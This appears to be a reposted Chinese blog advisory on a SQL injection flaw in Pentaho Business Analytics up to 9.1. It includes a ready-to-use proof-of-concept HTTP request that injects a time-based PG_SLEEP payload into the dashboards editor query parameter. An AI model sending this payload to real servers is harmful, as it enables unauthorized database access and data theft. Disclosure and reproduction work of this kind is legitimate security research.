本文共 865 字,大约阅读时间需要 2 分钟。
Pentaho Business Analytics 是一款专注于大数据资产管理的业务分析平台,旨在帮助用户安全地访问、集成、操作、可视化和分析数据资产。
Pentaho 业务分析平台已知存在一处严重的 SQL 注入漏洞,具体位置位于 /pentaho/api/repos/dashboards/editor 路径的查询参数中。攻击者可通过这一漏洞未经授权执行任意 SQL 语句,可能导致数据泄露、账号密码获取等安全风险。
该漏洞影响 Pentaho 业务分析平台版本 <= 9.1,已知存在的安全隐患可能对企业数据安全造成严重威胁。
建议在以下环境中进行漏洞复现:
以下 Proof of Concept (PoC) 代码展示了如何利用该漏洞:
GET /pentaho/api/repos/dashboards/editor?command=executeQuery&datasource=pentaho_operations_mart&require-cfg.js&query=%3BSELECT+PG_SLEEP%288%29-- HTTP/1.1Host: your-ipUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15.7) AppleWebKit 605.1.15 (KHTML, like Gecko) Version/14.1.1 Safari 605.1.15
此 PoC 通过构造特定 SQL 语句,利用 PG_SLEEP 函数实现注入,导致系统响应延迟。攻击者可进一步利用该漏洞获取敏感信息或控制系统。
通过以上内容,可以全面了解该 SQL 注入漏洞的性质、复现方法及其潜在风险。
转载地址:http://dlvfk.baihongyu.com/